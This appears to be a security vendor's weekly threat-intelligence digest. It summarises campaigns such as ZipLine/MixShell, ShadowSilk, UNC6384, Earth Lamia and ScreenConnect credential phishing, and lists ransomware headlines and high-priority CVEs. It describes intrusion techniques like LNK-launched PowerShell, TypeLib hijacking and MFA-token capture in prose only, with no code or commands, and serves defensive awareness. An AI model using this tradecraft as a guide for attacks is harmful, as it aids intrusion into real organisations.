Skip to main content Skip to footer 
ZipLine campaign leverages seemingly legitimate business interactions to deploy MixShell
Check Point researchers identified a social engineering campaign, dubbed ZipLine, leveraging seemingly legitimate business interactions to deploy a custom malware implant, dubbed MixShell, against critical United States supply chain manufacturing companies. The threat actor initiates communication with the target via their ‘Contact Us’ form, requiring the company to initiate the email correspondence, and maintains business-oriented communication for weeks before deploying a malicious ZIP archive. The ZIP archive, which is hosted on a trusted platform, contains legitimate PDF and DOCX files and an embedded malicious LNK file, alongside a PowerShell script that is directly embedded within the ZIP archive’s binary. The LNK file executes the embedded PowerShell script in memory, before establishing persistence via the TypeLib hijacking technique. MixShell dynamically locates Windows API functions and stores their addresses in the shellcode’s main runtime structure and creates a mutex to ensure only one instance is active per host. MixShell previously stored its configuration values in plaintext, with a shift to hex encoding and XOR-encryption being an indication of the developers evolving the malware. A PowerShell-based variant was also identified, which establishes persistence via a scheduled task.
ShadowSilk targets Asian government entities for data exfiltration
In late 2024, Group-IB researchers discovered the threat actor ShadowSilk orchestrating a series of attacks targeting government organizations within the Central Asia and Asia-Pacific region for data exfiltration. The activity has been ongoing since 2023 and remains active as of July 2025, with the most recent campaign taking place between January and July 2025. ShadowSilk leverages a wide range of tools and exploits, including vulnerabilities such as CVE-2018-7600, CVE-2018-7602, and CVE-2024-27956, intrusion and control tools like Metasploit, Cobalt Strike, and Godzilla webshell, as well as web panels to manage infected devices. For initial access, ShadowSilk uses phishing emails to lure recipients into opening a password-protected archive and running an executable. Once the binary is launched, the victim’s device is infected with malware that leverages Telegram for C2 communication. The attackers then download and launch additional malicious programs and modify the Windows registry for persistence. ShadowSilk consists of two sub-groups, YoroTrooper and Silent Lynx, and contains Russian and Chinese-speaking developers and operatives.
UNC6384 hijacks web traffic to deliver SOGU.SEC backdoor to diplomats
In March 2025, Google researchers discovered a campaign targeting diplomats in Southeast Asia and other entities globally. The campaign is believed to be in support of cyberespionage operations aligned with the strategic interests of China. It involves the attackers hijacking target web traffic to deliver a digitally signed downloader, dubbed STATICPLUGIN, that downloads a new sideloaded DLL, dubbed CANONSTAGER, for the delivery of a variant of the SOGU.SEC backdoor in memory. The malware is delivered under the guise of an Adobe Plugin update, with the attackers leveraging an attacker-in-the-middle attack to direct users to a specific website using a captive portal. The landing page is completely blank aside from a yellow bar and button asking the user to install a missing plugin, while JavaScript is silently loaded and executed in the background. The campaign has been attributed to UNC6384, which is believed to be associated with the China-linked threat actor TEMP.Hex.
Earth Lamia targets Vietnamese educational facilities with Cobalt Strike and tunnelling tools
Ctrl-Alt-Int3l researchers identified a Chinese threat actor successfully compromising at least 25 Vietnamese universities and education facilities via tools such as Cobalt Strike to persist within their environments and gather intelligence. The threat actor gained access via the exploitation of public facing vulnerabilities using Metasploit, uploading Godzilla webshells, or through SQL injection. After gaining access, the attacker deployed Cobalt Strike beacons before exploiting local Windows vulnerabilities for privilege escalation and installing tunnelling software for persistent remote access. Among the tunnelling software used was VShell and CS C2 frameworks, a persistent Remote Desktop Protocol tunnel, and .NET webshells. Similarities within C2 protocols and strings suggest the Linux-based SNOWLIGHT malware was used alongside the deployment of VShell. Based on the activity overlap and victimology, the campaign has been attributed to Earth Lamia.
Spear phishing campaign targets ScreenConnect cloud administrators for full remote control
Mimecast researchers identified an ongoing credential harvesting campaign leveraging spear phishing emails delivered via Amazon Simple Email Service accounts to target senior ScreenConnect cloud administrators. The attackers attempt to gain administrator credentials to establish control over remote access infrastructure across organizations. The emails detail a new login alert and feature a ‘Review Security’ button that directs the user to one of two phishing pages, the first displaying the ScreenConnect login portal, while the second displays the login portal for ConnectWise. The EvilGinx framework is used to capture usernames and passwords alongside multi–factor authentication tokens in real-time, enabling full access to ScreenConnect super admin accounts and the deployment of additional access tools or malware for lateral movement. The campaign has apparent connections with ransomware operations. Qilin ransomware affiliates leverage similar ScreenConnect targeting, likely as initial access vectors for ransomware deployment. Abnormal AI researchers observed a similar campaign instead leveraging fake Zoom and Microsoft Teams invites to trick victims into installing ScreenConnect for credential harvesting and full device control. Over 900 companies have been knowingly targeted.
Ransomware
Storm-0501’s evolving techniques lead to cloud-based ransomwareMicrosoft Security Blog – Aug 27 2025The Underground Ransomware Gang Is Back with a Vicious New Global CampaignSecurityonline.info – Aug 27 2025First known AI-powered ransomware uncovered by ESET ResearchWeLiveSecurity – Aug 26 2025Cephalus ransomware abuses SentinelOne executable for DLL sideloadingSC Media – Aug 25 2025Colt Discloses Breach After Warlock Ransomware Group Puts Files Up for SaleSecurity Affairs – Aug 22 2025Examining the tactics of BQTLOCK Ransomware & its variantsK7 Computing – Lab Blog – Aug 22 2025
Financial Services
The Price of Trust: Analyzing the Malware Campaign Exploiting TASPEN’s Legacy to Target Indonesian Senior Citizens CloudSEK Blog – Aug 27 2025New Hook Android Banking Malware Emerges with Advanced Features and 107 Remote CommandsGBHackers On Security – Aug 26 2025Financial Sector Threats: The Shifting LandscapeThreat Reports – KnowBe4 – Aug 21 2025Android Document Readers and Deception: Tracking the Latest Updates to AnatsaZscaler – Aug 21 2025Evolving Mule Tactics in the META Region Banking SectorGroup-IB – Aug 20 2025
Geopolitics
Cyberattack on Israeli ‘kosher’ internet providerDataBreaches.net – Aug 26 2025Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage SystemCISA Cybersecurity Advisories – Aug 25 2025‘Cyber partisans’ hack Russian TV, broadcast battlefield casualties and ‘truth’ about war, HUR source claimsThe Kyiv Independent – Aug 25 2025MURKY PANDA: Trusted-Relationship Cloud Threat CrowdStrike blogs – Aug 21 2025UAC-0057 keeps applying pressure on Ukraine and PolandHarfangLab – Aug 20 2025
High Priority Vulnerabilities
| Name | Software | Base Score | Temp Score | |
|---|---|---|---|---|
| CVE-2025-7775 | NetScaler Gateway | 9.8 | 7.7 | |
| Related: Critical and high-severity flaws addressed in Citrix NetScaler ADC and NetScaler Gateway | ||||
| CVE-2025-48384 | Visual Studio | 8.0 | 5.3 | |
| Related: High-severity arbitrary file write flaw in Git actively exploited | ||||
| CVE-2024-36401 | GeoServer | 9.8 | 9.4 | |
| Related: Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth | ||||
| CVE-2025-23312 | NeMo Framework | 7.8 | 7.8 | |
| CVE-2025-7783 | form-data | 5.6 | 5.4 | |
| Related: Critical and high-severity flaws fixed across Atlassian products | ||||